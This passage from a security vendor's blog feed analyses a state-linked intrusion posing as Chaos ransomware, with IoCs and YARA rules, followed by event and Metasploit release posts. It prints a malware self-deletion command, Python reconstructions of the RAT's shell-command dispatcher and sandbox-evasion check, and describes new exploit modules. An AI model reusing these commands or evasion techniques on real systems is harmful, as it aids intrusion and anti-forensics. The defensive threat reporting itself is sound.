A subsequent email introduced a new contact address and instructed recipients to locate a note allegedly placed within their Desktop directory containing “access credentials” for a secure chat. Rapid7 conducted a threat hunt across all assets that focused on files created or accessed within Desktop directories and subdirectories and did not identify any artifacts consistent with the TA’s claims. The victim further validated the affected user systems and confirmed the absence of such files. Despite these inconsistencies in the initial proof-of-compromise, the TA later published the stolen data on its DLS in line with modern extortion tactics. The victim confirmed that the leaked data was legitimate.

Malware analysis

ms_upd.exe 

The binary functions as a downloader that begins by collecting basic host information, including computer name, username, and domain. This data is used to generate a unique client identifier, concatenating computer name, username, and tick count, which is sent to the C2 server moonzonet[.]com via a /register request, followed by periodic /check requests to determine the execution flow.

Based on the C2 response, the malware either proceeds when receiving an “approved” status or retries registration, if instructed. Once approved, it reports a “downloading” status and prepares a working directory under the user’s Downloads folder (falling back to C:\Users\Public\Downloads if necessary).

The dropper then retrieves three payload components from the C2:

  • Game.dll (saved as WebView2Loader.dll)

  • Game.exe

  • Game.config (saved as visualwincomp.txt)

If all downloads succeed, the malware reports a “running” status and executes the primary payload - Game.exe. Execution success is monitored, with the result communicated back to the C2 as either “success” or “error”. Upon successful execution, the dropper triggers a self-deletion routine via a delayed command cmd.exe /c ping 127.0.0.1 -n 6 > nul && del /f /q \"%s\".
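The registration and status flow described above can be sketched in Python. This is a defender-side reconstruction for illustration only, not the dropper's actual code; the client-ID separator and function names are assumptions, while the status strings and concatenated fields come from the analysis.

```python
# Illustrative sketch of the ms_upd.exe registration flow (not malware source).
# Assumed: "-" as a separator and these function names; status strings are
# the ones reported to the C2 per the analysis above.

def make_client_id(computer_name: str, username: str, tick_count: int) -> str:
    # Unique identifier concatenating computer name, username, and tick count.
    return f"{computer_name}-{username}-{tick_count}"

def next_action(status: str) -> str:
    # Execution flow driven by the C2's /check response.
    if status == "approved":
        return "download"        # report "downloading", fetch the payloads
    return "re-register"         # retry registration if instructed

print(make_client_id("WIN-HOST", "jdoe", 123456))  # -> WIN-HOST-jdoe-123456
print(next_action("approved"))                     # -> download
```

The same pattern (register, poll for approval, report status) is what gives defenders the /register and /check URI artifacts used in the YARA rule later in this post.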

ms-upd-main-function-snippet.png
Figure 6: Snippet from the main function of ms_upd.exe

As seen in Figure 6, the malware doesn’t use any form of obfuscation to hide its purpose: API imports are statically resolved, and strings are stored in plaintext. This simplicity suggests the tool was likely developed for limited or single-use deployment.

At the time of writing, only two samples have been observed in public repositories, both exhibiting identical functionality.

Game.exe

Game.exe is a custom RAT that masquerades as a legitimate Microsoft WebView2 application. Analysis of the binary's PDB path C:\Users\pc\Downloads\WebView2Samples-main\WebView2Samples-main\SampleApps\WebView2APISample\Release\x64\WebView2APISample.pdb confirms that the developer trojanized the official Microsoft WebView2APISample project: https://github.com/MicrosoftEdge/WebView2Samples/tree/main/SampleApps/WebView2APISample

Unlike the dropper, the malware implements several obfuscation and anti-analysis techniques:

| ATT&CK ID | Technique | Purpose | Example |
| --- | --- | --- | --- |
| T1027.007 | Dynamic API and DLL resolution | Hide the malware functionality | Usage of LoadLibraryA() and GetProcAddress() APIs |
| T1027 | String obfuscation | Hide sensitive strings from AV solutions | Names of DLLs, APIs, registry paths |
| T1497.001 | Sandbox detection | Search for known analysis-related DLLs that are loaded into the current process | sbiedll.dll, dbghelp.dll, api_log.dll, vmcheck.dll, wpespy.dll |
| T1497.001 | Virtual machine detection via CPU | Compare the processor name string against a list of virtualization-related keywords | Virtual, VMWare, KVM, Hyper-V |
| T1082 | Removable drive enumeration | Enumerate logical drives and check if any removable drives are present | Usage of GetLogicalDrives() and GetDriveTypeA() to enumerate logical drives and compare their type against DRIVE_REMOVABLE |
| T1497.003 | Sleep / timing check | Identify sandbox time-skipping mechanisms or hooked timing APIs | GetTickCount() followed by Sleep(1000) and another GetTickCount() to verify approximately one second elapsed |

Table 3: Anti-analysis / anti-detection techniques used by Game.exe
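As a concrete illustration of the last technique in Table 3, the timing check can be reproduced in Python: if far less time elapses than the requested sleep, a sandbox has likely fast-forwarded the delay. This is an analogue of the GetTickCount()/Sleep() pattern, not the malware's code, and the function name and tolerance value are assumptions.

```python
import time

def sleep_was_skipped(expected_s: float = 1.0, tolerance_s: float = 0.5) -> bool:
    """Python analogue of the GetTickCount/Sleep/GetTickCount check:
    sleep, then verify that roughly the requested time actually elapsed.
    Returns True if the sleep appears to have been skipped/accelerated."""
    start = time.monotonic()
    time.sleep(expected_s)
    elapsed = time.monotonic() - start
    return elapsed < expected_s - tolerance_s

# On real hardware the sleep is honored, so no skip is detected.
print(sleep_was_skipped(0.2, 0.15))  # -> False
```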

If the malware does not detect an analysis environment, it establishes persistence by self-installing into a randomized directory under C:\ProgramData\visualwincomp-<random>\, where it copies itself alongside a legitimate WebView2Loader.dll and an encrypted configuration file, visualwincomp.txt.
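Defenders hunting for this persistence mechanism can match file paths against the visualwincomp-<random> directory pattern. A minimal sketch (function name hypothetical):

```python
import fnmatch
from pathlib import PureWindowsPath

def is_suspect_path(path: str) -> bool:
    """Flag any path containing a directory matching the randomized
    visualwincomp-<random> persistence pattern described above."""
    parts = [part.lower() for part in PureWindowsPath(path).parts]
    return any(fnmatch.fnmatch(part, "visualwincomp-*") for part in parts)

print(is_suspect_path(r"C:\ProgramData\visualwincomp-8f3a\Game.exe"))  # -> True
```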

Additionally, the malware enforces single execution on an infected host by registering the mutex ATTRIBUTES_ObjectKernel.

The RAT decrypts its configuration using AES-256-GCM to extract the attacker’s C2 server hostname uploadfiler[.]com and port 443. The malware first registers the victim by sending registration information such as computer name, username, and privilege level to the /home endpoint. Once registered, it enters an infinite loop polling /index.php every 60 seconds. The RAT features 12 core capabilities including arbitrary command execution via hidden cmd.exe or encoded PowerShell sessions; file uploads with retry logic; file deletion; and the establishment of persistent interactive shells. Command results and execution status are reported back to the /profile endpoint. 

| Command | Description |
| --- | --- |
| run_cmd | Execute command via cmd.exe |
| run_powershell | Execute command via PowerShell |
| upload | Write base64-encoded file |
| upload_chunk | Chunked file upload with append mode |
| delete_file | Delete a file |
| cmd_start | Start interactive cmd.exe shell |
| cmd_input | Send input to interactive shell |
| cmd_stop | Stop interactive shell |
| ps_start | Start interactive PowerShell |
| ps_input | Send input to PowerShell |
| ps_stop | Stop interactive PowerShell |
| re_register | Re-register with a new agent_id |

Table 4: Supported commands of the RAT
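The command handling described above can be illustrated with a small dispatcher. This is a reconstruction of the described logic for a few of the commands in Table 4, not the RAT's source; the task field names ("cmd", "cmd_line", "path") are assumptions.

```python
import subprocess

def dispatch(task: dict) -> str:
    """Toy dispatcher mirroring a subset of the Table 4 commands."""
    cmd = task.get("cmd")
    if cmd == "run_cmd":
        # The RAT executes commands via a hidden cmd.exe; shown generically here.
        out = subprocess.run(task["cmd_line"], shell=True,
                             capture_output=True, text=True)
        return out.stdout
    if cmd == "delete_file":
        return f"would delete {task['path']}"   # destructive action stubbed out
    if cmd == "re_register":
        return "re-registering with new agent_id"
    return "unknown command"

print(dispatch({"cmd": "run_cmd", "cmd_line": "echo hello"}))
```

In the real malware, each result would be posted back to the /profile endpoint along with an execution status.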


The malware design is unorthodox, characterized by an inconsistent approach to concealment. While it utilizes XOR encoding (key: 0xAB) to hide specific anti-analysis strings, such as VM detection keys and sandbox-related DLL names, critical indicators like file paths, RAT command strings, and JSON registration formats are left in plaintext. 
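Because XOR with a single-byte key is its own inverse, the obfuscated strings can be recovered trivially during analysis. A minimal decoder for the 0xAB key:

```python
def xor_decode(data: bytes, key: int = 0xAB) -> bytes:
    """Decode strings XOR-encoded with the single-byte key 0xAB,
    as used by Game.exe for its anti-analysis strings."""
    return bytes(b ^ key for b in data)

# Round-trip example with one of the sandbox DLL names the malware hides:
encoded = xor_decode(b"sbiedll.dll")   # XOR is its own inverse
print(xor_decode(encoded).decode())    # -> sbiedll.dll
```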

This inconsistency extends to its interaction with the Import Address Table (IAT). While the malware dynamically resolves certain sensitive APIs at runtime, such as CreateMutexA, other highly suspicious functions like CreatePipe and CreateProcessA remain statically linked. Notably, the developer dynamically loads the Sleep API via GetProcAddress despite it already being statically imported in the IAT.

These architectural discrepancies suggest the author is likely an unseasoned developer. The mixture of static imports and visible strings provides significant telemetry for AV and EDR solutions to identify and stop the threat (confirmed during the incident response).

Similar to ms_upd.exe, a hunt on public malware-sharing platforms surfaced another sample (SHA256 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90) implementing the same logic as Game.exe but masquerading as WebView2.exe.

Attribution was initially challenging due to the absence of specialized attack patterns or known APT delivery vectors, such as the NSIS installers favored by Chinese APTs. However, the presence of a specific signing certificate, together with the work of other threat researchers, made attribution possible.

Certificate

While the TA adopted the Chaos Ransomware brand to project a cybercriminal identity, the underlying infrastructure reveals a signature previously associated with infrastructure linked to the Iranian Ministry of Intelligence and Security (MOIS). The primary technical bridge to the APT group MuddyWater (Seedworm) is the code-signing certificate used to validate the malware samples.

During the analysis of the downloader (ms_upd.exe), we identified a consistent digital signature:

| Field | Value |
| --- | --- |
| Name | Donald Gay |
| Issuer | Microsoft ID Verified CS AOC CA 02 |
| Algorithm | sha384RSA |
| Thumbprint | B674578D4BDB24CD58BF2DC884EAA658B7AA250C |
| Serial Number | 33 00 07 9A 51 C7 06 3E 66 05 3D 22 9B 00 00 00 07 9A 51 |
| Status | Time-invalid (revoked shortly after deployment) |

Table 5: Certificate details
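Defenders may want to sweep signed binaries for this certificate. A minimal sketch that normalizes a thumbprint string and checks it against the indicator from Table 5 (helper name hypothetical):

```python
# Hypothetical hunting helper: normalize an Authenticode thumbprint and
# compare it against known MuddyWater-linked certificate indicators.

KNOWN_BAD_THUMBPRINTS = {
    "B674578D4BDB24CD58BF2DC884EAA658B7AA250C",  # "Donald Gay" (Table 5)
}

def is_known_bad(thumbprint: str) -> bool:
    # Accept colon- or space-delimited hex in any case.
    normalized = thumbprint.replace(":", "").replace(" ", "").upper()
    return normalized in KNOWN_BAD_THUMBPRINTS

print(is_known_bad("b6:74:57:8d:4b:db:24:cd:58:bf:2d:c8:84:ea:a6:58:b7:aa:25:0c"))  # -> True
```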

The "Donald Gay" certificate is a known shared resource within MuddyWater’s toolkit. Alongside its frequent companion, "Amy Cherne," this identity forms a distinct cluster of Iranian MOIS-affiliated infrastructure. According to threat intelligence reports from March and April 2026, this specific certificate has been tied directly to MuddyWater’s "Operation Olalampo," a campaign targeting organizations across the U.S. and the MENA (Middle East and North Africa) regions. Historically, this identity was also used to sign Stagecomp (ms_upd.exe), a downloader for the Darkcomp backdoor (Game.exe), both of which are firmly attributed to MuddyWater by multiple global security vendors.

Beyond the certificate, other technical artifacts solidify this attribution:

  • Infrastructure overlap: The domain moonzonet[.]com, which served as the C2 for ms_upd.exe, was linked to MuddyWater in early 2026 during a wave of activity targeting Israeli and Western organizations.

  • Execution tradecraft: The group’s signature use of pythonw.exe to inject code into suspended processes remains a consistent hallmark of their deployment chain.

  • Social engineering technique: The use of interactive Microsoft Teams sessions to harvest MFA and credentials aligns closely with the "IT Support" persona MuddyWater has refined throughout 2026.

Attribution: The "Chaos" masquerade

The convergence of technical and contextual evidence is consistent with attribution to MuddyWater with moderate confidence. The observed use of Chaos ransomware does not indicate a shift in the group’s underlying objectives, but rather reflects a consistent effort to obscure operational intent and complicate attribution. While attribution evasion is a common characteristic of state-affiliated actors, MuddyWater’s reported increase in operational activity as of early 2026, primarily involving cyber espionage and potential prepositioning for disruptive operations across Western and Middle Eastern networks, has likely intensified its reliance on deceptive false-flag operations.

This assessment aligns with previously observed behavior. In late 2025, MuddyWater was linked to activity involving the Qilin RaaS ecosystem in an operation targeting an Israeli organization. Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability.

The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution. Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as DWAgent or AnyDesk.

Notably, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion. The deviation highlights a mismatch between typical profit-driven ransomware behavior and the actor’s apparent espionage objectives, and may also explain the inconsistent proof-of-compromise data initially provided by the TA.

Taken together, these technical indicators and procedural inconsistencies are indicative of a targeted, state-sponsored intrusion masquerading as opportunistic extortion activity.

Conclusion

This incident highlights the increasing convergence between state-sponsored intrusion activity and cybercriminal tradecraft. While the operation incorporated recognizable elements of ransomware campaigns, such as extortion messaging and leak site publication, the absence of encryption and the presence of established espionage techniques suggest that financial gain was unlikely to be the primary objective.

The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response.

This case underscores the importance of looking beyond overt ransomware indicators. Defenders should also focus on the underlying intrusion lifecycle. Techniques such as social engineering via enterprise communication platforms, credential harvesting with MFA manipulation, and the abuse of legitimate remote access tools remain critical enablers of compromise.

Ultimately, this activity is best understood as a hybrid intrusion model, in which ransomware is leveraged not as an end goal but as a mechanism for concealment, coercion, and operational flexibility within a broader intelligence-driven campaign.

For additional blog posts and detailed analysis from Rapid7 Labs on cyber activity related to the conflict, please visit our Iran Conflict Cyber Threat Intelligence Hub.

Rapid7 Customers

Indicators of compromise (IoCs)

File indicators

| File name | SHA256 | Description |
| --- | --- | --- |
| ms_upd.exe | 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 | Initial downloader ms_upd.exe |
| DIDS.exe | a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 | Initial downloader found during hunt on public repositories |
| Game.exe | 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 | RAT deployed during the intrusion |
| WebView2.exe | 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 | RAT found during hunt on public repositories |
| visualwincomp.txt | c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0 | Encrypted config holding C2 URL and port information |
| WebView2Loader.dll | a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a | DLL downloaded by ms_upd.exe |
| dwagent.exe | cd098eddb23f2d2f6c42271ca82803b0d5ac950cb82a9b8ae0928e83945a53df | Remote management tool leveraged by the TA |
| dwagent.exe | cf3dfd1d6626fd2129abb7a5983c11827f4b0d497e2dba146a1889bd71f23cd5 | Renamed pythonw.exe |
| dwagsvc.exe | a3bac548b5bc91c526b4d6707623ddbd1a675aa952f0d1f9a0aa6f7230f09f23 | Service binary of DWService |
| dwaglnc.exe | 86e0197389f0573eb83ff53991f337d416124c7c8bd727721ef3d396cd5f65dc | Background and system tray binary of DWService |
| AnyDesk.exe | bfc1675ee1e358db8356f515aaded7962923e426aa0a0a1c0eddfc4dab053f89 | Remote management tool leveraged by the TA |
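A simple way to operationalize these file indicators is to hash files of interest and compare against the SHA256 values above. A minimal triage sketch (only two indicators shown for brevity; helper names hypothetical):

```python
import hashlib
from pathlib import Path

# Two of the SHA256 indicators from the table above.
IOC_SHA256 = {
    "24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14",  # ms_upd.exe
    "1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6",  # Game.exe
}

def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries don't exhaust memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def matches_ioc(path: Path) -> bool:
    return sha256_of(path) in IOC_SHA256
```

Pointing `matches_ioc` at staging directories such as C:\ProgramData is one low-effort sweep derived directly from this incident.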

Network indicators

| Indicator | Description |
| --- | --- |
| adm-pulse[.]com | Quick Assist themed phishing website |
| moonzonet[.]com | URL hosting a second stage RAT Game.exe |
| uploadfiler[.]com | C2 extracted from a config file visualwincomp.txt |
| 77.110.107[.]235 | Source IP address of malicious Microsoft Teams activity |
| 93.123.39[.]127 | Source IP address of malicious Microsoft Teams activity |
| 172.86.126[.]208 | C2 hosting initial downloader ms_upd.exe |
| 116.203.208[.]186 | IP contacted by renamed pythonw.exe |
| hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd[.]onion | Chaos RaaS DLS |
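These network indicators can be combined with the C2 endpoints observed in the malware analysis (/register, /check, /home, /index.php, /profile) for proxy-log hunting. A minimal sketch, with the defanged domains written plainly for matching (helper name hypothetical):

```python
import re

# Domains from the table above, re-fanged for matching against log fields.
C2_DOMAINS = {"moonzonet.com", "uploadfiler.com", "adm-pulse.com"}
# Endpoints described in the ms_upd.exe and Game.exe analysis.
C2_PATHS = re.compile(r"^/(register|check|home|index\.php|profile)$")

def is_suspect_request(host: str, path: str) -> bool:
    """Flag a proxy-log entry hitting a known C2 domain on a known endpoint."""
    return host.lower() in C2_DOMAINS and bool(C2_PATHS.match(path))

print(is_suspect_request("moonzonet.com", "/register"))  # -> True
```

Matching on domain plus endpoint, rather than domain alone, helps keep false positives down if an indicator is ever re-registered by a benign party.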

MITRE ATT&CK techniques

| ATT&CK ID | Name | Use |
| --- | --- | --- |
| T1566 | Phishing (Spearphishing via Service) | Initial access via Microsoft Teams messages and social engineering |
| T1059 | Command and Scripting Interpreter | Execution of discovery commands (ipconfig, whoami, etc.) |
| T1082 | System Information Discovery | Gathering host-level information from compromised machines |
| T1016 | System Network Configuration Discovery | Identifying network configuration via commands like ipconfig |
| T1078 | Valid Accounts | Use of harvested credentials for authentication and access |
| T1056 | Input Capture | Users entering credentials into attacker-directed files/pages |
| T1556 | Modify Authentication Process | MFA manipulation to add attacker-controlled devices |
| T1021.001 | Remote Services: RDP | Remote access to internal systems via RDP sessions |
| T1219 | Remote Access Tools | Use of DWAgent and AnyDesk for persistence and control |
| T1543 | Create or Modify System Process | Installation of DWAgent as a service |
| T1055 | Process Injection / Proxy Execution | Abuse of renamed Python binary for execution |
| T1105 | Ingress Tool Transfer | Downloading payloads via curl (ms_upd.exe) |
| T1041 | Exfiltration Over C2 Channel | Data exfiltration to external infrastructure |
| T1027 | Obfuscated/Encrypted Files or Information | Encrypted configuration (visualwincomp.txt) |
| T1497 | Virtualization/Sandbox Evasion | Anti-VM checks in Game.exe |
| T1622 | Debugger Evasion | Evasion techniques to avoid analysis |
| T1071 | Application Layer Protocol | C2 communication over web protocols |
| T1573 | Encrypted Channel | Encrypted communication with C2 infrastructure |
| T1133 | External Remote Services | VPN access using compromised accounts |
| T1087 | Account Discovery | Identifying user accounts via commands |
| T1018 | Remote System Discovery | Enumerating systems in the network |

YARA rules

rule MuddyWaterRAT{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the RAT used by the MuddyWater, based on plain text string. Original sample MD5 F8560B9A893EEB2130FC7159E9C1B851"

strings:


		//TKP - Token privilege 
		$TKP1 = "System"
		$TKP2 = "Admin"
		$TKP3 = "User"

        // DF - Data format
		$DF1 = "\"computer_name\":\""
		$DF2 = "\"username\":\"" 
		$DF3 = "\"domain\":\"" 
		$DF4 = "\"local_ip\":\"127.0.0.1\"" 
		$DF5 = "\"privilege\":\"" 
		$DF6 = "\"process_name\":\"agent-" 
		$DF7 = "\"version\":\"E.1.0\"" 
		$DF8 = "\"sleep_time\":60" 


        //IAT - Import address table
        $IAT1   = "GetComputerNameA"
        $IAT2   = "GetUserNameA"
        $IAT3   = "NetWkstaGetInfo"
        $IAT4   = "NetApiBufferFree"
        $IAT5   = "AllocateAndInitializeSid"
        $IAT6   = "OpenProcessToken"
        $IAT7   = "GetTokenInformation"
        $IAT8   = "EqualSid"
        $IAT9   = "CheckTokenMembership"

        //MSC - misc
        $MSC1 = "re_register"
        $MSC2 = "cmd_id"
        $MSC3 = "cmd_id"
        $MSC4 = "run_cmd"
        $MSC5 = "cmd_line"
        $MSC6 = "run_powershell"

		condition:
			uint16(0) == 0x5A4D  and all of($TKP*) and all of($DF*) and all of($IAT*) and all of ($MSC*) 
}

rule MuddyWaterDownloader{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the downloader used by the MuddyWater, based on plain text string. Original sample MD5 439C0A0A46627BD166E08436F383AD56"

	strings:


		//ST - Status
		$ST1 = "downloading"
		$ST2 = "running"
		$ST3 = "success"
		$ST4 = "error"

		//SFF - Scanf formats
		$SFF1 = "EXIT_%lu"
		$SFF2 = "RUN_%lu"
		$SFF3 = "DL_%s"

		//ICO - Internet communication operation 
		$ICO1 = "/register" ascii wide
		$ICO2 = "/check" ascii wide
		$ICO3 = "/status" ascii wide
        $ICO4 = "GET" ascii wide
        $ICO5 = "POST" ascii wide
        $ICO6 = "CONN_ERR" ascii wide
        $ICO7 = "REQ_ERR" ascii wide
        $ICO8 = "SEND_ERR" ascii wide
        $ICO9 = "RECV_ERR" ascii wide
        $ICO10 = "HTTP_%lu" ascii wide

        //FO - File operation
        $FO1 = "wb"
        $FO2 = "EMPTY"
        $FO3 = "FILE_ERR"

        // DF - Data format
        $DF1 = "\"client_id\":\"%s\""
        $DF2 = "\"status\":\"%s\""
        $DF3 = "\"error_code\":\"%s\""

        //IAT - Import address table
        $IAT1   = "GetLastError"
        $IAT2   = "Sleep"
        $IAT3   = "WinHttpOpen"
        $IAT4   = "WinHttpConnect"
        $IAT5   = "WinHttpOpenRequest"
        $IAT6   = "WinHttpSendRequest"
        $IAT7   = "WinHttpReceiveResponse"
        $IAT8   = "WinHttpReadData"
        $IAT9   = "WinHttpCloseHandle"
        $IAT10  = "DeleteFileA"



		condition:
			uint16(0) == 0x5A4D  and all of($ST*) and all of($SFF*) and all of($ICO*) and all of ($FO*) and all of ($DF*) and all of ($IAT*)
}

A Walkthrough of the 2026 Global Cybersecurity Summit Agenda

5 May 2026 at 08:20

The full agenda for the Rapid7 2026 Global Cybersecurity Summit is now live, and it gives a clearer sense of how the conversation around security operations is evolving.

Across two days, the sessions progress from a shared understanding of how threats are changing into a more detailed look at how teams detect, respond, and make decisions in practice.

Day 1: How threats evolve and how teams respond

The day opens with a keynote, Defense Starts Earlier Than You Think, where Brian Castagna is joined by Craig Robinson, Research Vice President at IDC, to examine why complexity has become the main barrier to effective security and what changes when teams start acting earlier.

That context carries into The Reality of Running a SOC in 2026, featuring Raj Samani alongside Rachel Tobac, CEO of SocialProof Security, and Graham Cluley, cybersecurity speaker and podcast host. The discussion focuses on how attacks actually begin, from identity misuse to cloud misconfigurations, and why defenders often fall behind as those attacks evolve.

In Customer Panel: How Clarity Beats Complexity, leaders including Debby Briggs, CISO at Netscout Systems, Raheem Daya, Chief Technology Officer at Target RWE, and Will Lambert from Culligan International share how they are simplifying their environments and focusing on outcomes rather than activity.

From there, Inside the Modern SOC: Who Carries You Through an Incident walks through a real investigation step by step, showing how alerts are triaged, decisions are made, and outcomes are shaped under pressure.

The conversation then turns to AI in The AI Dilemma: Automating Defense Without Surrendering Judgment, where the role of AI in the SOC is examined through the lens of trust, transparency, and how it supports analyst decision-making in practice.

In Beyond the Vulnerability List, the focus shifts to exposure management, looking at how organizations are moving beyond static vulnerability tracking and using exposure as an early signal to guide detection and response.

That idea of validation continues in Using Red Teaming to Power Preemptive MDR, where continuous adversary testing is used to prove detection coverage and refine response workflows before an incident occurs.

The day also includes a short look at Rapid7: What’s New and What’s Next, connecting recent innovations across exposure management, MDR, and AI to how teams operate in practice.

The closing session, Persistence Under Pressure, introduces a different perspective. Former Special Forces operator Jason Fox draws on real-world experience to explore preparation, understanding the adversary, and how teams make decisions when conditions are less predictable.

Day 2: Strategy for leaders, execution for practitioners

The second day builds on that foundation, with two dedicated tracks designed around how security teams actually work.

For security leaders, The CISO’s Role in Enterprise Transformation brings together perspectives from Craig Robinson and Horst Moll, CISO at Miltenyi Biotec, to explore how the role of the CISO is evolving beyond technical leadership into broader organizational influence.

That is followed by How Exposure Insights Reframe Risk and Security Decisions, which looks at how leaders define priorities and align teams when exposure data is tied more closely to real-world risk.

In A CISO’s Guide to MDR Accountability and Outcomes, the focus moves to how effectiveness is measured, shifting from activity-based metrics toward outcomes that reflect business impact.

The leader track closes with Customer Panel: What CISOs Would Do Differently If Starting Today, featuring CISOs including Jonathan Chow of Genesys and Tony Arnold of TSB Bank, reflecting on what they would change or simplify based on experience.

For practitioners, Hunt or Be Hunted: Frontline Tales of Detection walks through a real incident, showing how analysts decide what to investigate and how signals are correlated across environments.

The New Rules of Detection Engineering builds on that with insights from Steve Edwards, Director of Threat Intelligence Detection Engineering, focusing on detection-as-code and how teams prioritize signals in practice.

In From Cloud Exposure to Runtime Attack, Shauli Rozen, CEO and Co-founder of ARMO, and Ben Hirschberg, CTO and Co-founder, walk through a cloud attack scenario to show how risks escalate and how they can be interrupted earlier.

The practitioner track closes with IR in Practice: Tools, Tradecraft, and Adversary-Informed Investigation, where Shanna Battaglia and Michael Cohen demonstrate how open-source tools and real-world workflows come together during incident response.

Register and join the conversations

Taken together, the agenda reflects a shift that runs through every session. Security operations are moving toward earlier decisions, better prioritization, and a clearer understanding of what matters in the moment.

If you want to see how that shift is playing out across strategy, detection, and response, this is where those conversations come together.

Join us May 12–13 and explore the full agenda in practice.

Register now.

Metasploit Wrap-Up 05/01/2026

MCP server

This release, our very own cdelafuente-r7 finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official Ruby MCP SDK.

This first iteration is read-only, covering modules, hosts, services, vulnerabilities, and more. Tools for module execution, session interaction, and database modifications are on the roadmap for a future release. Full details are available in the documentation.

Copy Fail

Earlier this week, details of a new, high-profile Linux LPE were released alongside a public PoC. The bug, nicknamed Copy Fail and identified as CVE-2026-31431, is a logic flaw in the cryptographic APIs exposed by the Linux kernel. Metasploit shipped a local exploit this week that leverages the flaw on AMD64 and AArch64 targets, with additional architectures planned for future releases. The exploit, which replaces the ‘su’ binary in the page cache with a small ELF file, lets users specify command payloads for execution and automatically determines the appropriate target architecture.

New module content (3)

Microsoft Windows HTTP to LDAP Relay

Author: jheysel-r7

Type: Auxiliary

Pull request: #21323 contributed by jheysel-r7

Path: server/relay/http_to_ldap

Description: This adds a new NTLM relay module that relays from HTTP to LDAP. On success, an authenticated LDAP session is opened which allows the operator to interact with the LDAP service in the context of the relayed identity.

Copy Fail AF_ALG + authencesn Page-Cache Write

Authors: Diego Ledda, Spencer McIntyre, Xint Code, and rootsecdev

Type: Exploit

Pull request: #21395 contributed by zeroSteiner

Path: linux/local/cve_2026_31431_copy_fail

AttackerKB reference: CVE-2026-31431

Description: Adds a module for CVE-2026-31431 (The Copy Fail LPE for Linux), a local privilege escalation affecting almost every Linux Kernel since 2017.

Linux Execute Command

Author: Spencer McIntyre

Type: Payload (Single)

Pull request: #21395 contributed by zeroSteiner

Path: linux/aarch64/exec

Description: Adds the linux/aarch64/exec single payload, which executes an arbitrary command on AArch64 Linux targets.

Enhancements and features (5)

Bugs fixed (0)

None

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition, Metasploit Pro.

Five Things we Took Away from Gartner SRM Sydney 2026

By: Rapid7
29 April 2026 at 19:00

At this year's Gartner Security and Risk Management Summit in Sydney, Rapid7 CISO Brian Castagna joined industry CISO Nigel Hedges for a fireside chat on the decisions security leaders are actually making right now about budgets, burnout, AI, and consolidation.

The conversation reinforced what we see across many organizations: SecOps is very much focused on protecting business resilience, enabling confident decisions by senior security leaders, and building programs that scale across people, platforms, and emerging technology. Let's now take a look at some of the main highlights from this year's Summit.

The business case for SecOps has shifted and boards are listening

The ‘invest in security or get breached’ pitch has run its course. Boards have heard it too many times; plus, it frames security as a cost center that only proves its value when something goes wrong.

We’re seeing it being replaced by a resilience narrative. In most incidents, the biggest business impact is operational disruption. Hours or days of downtime create immediate revenue loss, reputational damage, and perhaps worse still for some, regulatory exposure. CISOs who can connect their programs to that reality – translating incident data into business availability and financial risk – find it significantly easier to justify spend and shape investment decisions.

That shift in dynamic changes what gets measured and prioritized as well as how security leaders communicate upward to the board. Threat intelligence and kill chains still matter inside the SOC, but the ability to translate that to a clear risk narrative is fast becoming a leadership requirement in its own right.

Platform consolidation is growing, but it's not binary

The platform-vs-best-of-breed debate was notably pragmatic. The real question is how to strike the right balance: Consolidate where it improves efficiency and visibility, retain point solutions where they materially reduce a specific risk.

On the ground, budget pressure has accelerated this. Fewer vendors, more integrated telemetry, and clearer operational ownership help make spend more defensible. The discussion framed consolidation through the lens of ‘control planes’ (endpoint, gateway, network), with shared telemetry as the connective layer.

A real-world example grounded the conversation: Build a global security program for a 5,000-person organization across 40 countries on a $3 million budget, using a selective mix of MDR, PAM, EPM, and targeted point solutions only where necessary. Throughout, the operating principle was simple: every security investment needs to answer what risk it reduces and, importantly, what business outcome it protects.

People remain the most difficult element of SecOps

Technology and process can be engineered, but people? They’re much harder. That was one of the most practical observations from the session, and it resonated with every security leader in the room.

The challenge goes beyond hiring technical talent: organizations need to build teams with the right mix of communication skills, cognitive diversity, motivation, and endurance. A common gap in the SOC is that many teams are strong technically, but few can articulate risk effectively to executives. That matters because the value of SecOps increasingly depends on how well teams connect activity to impact.

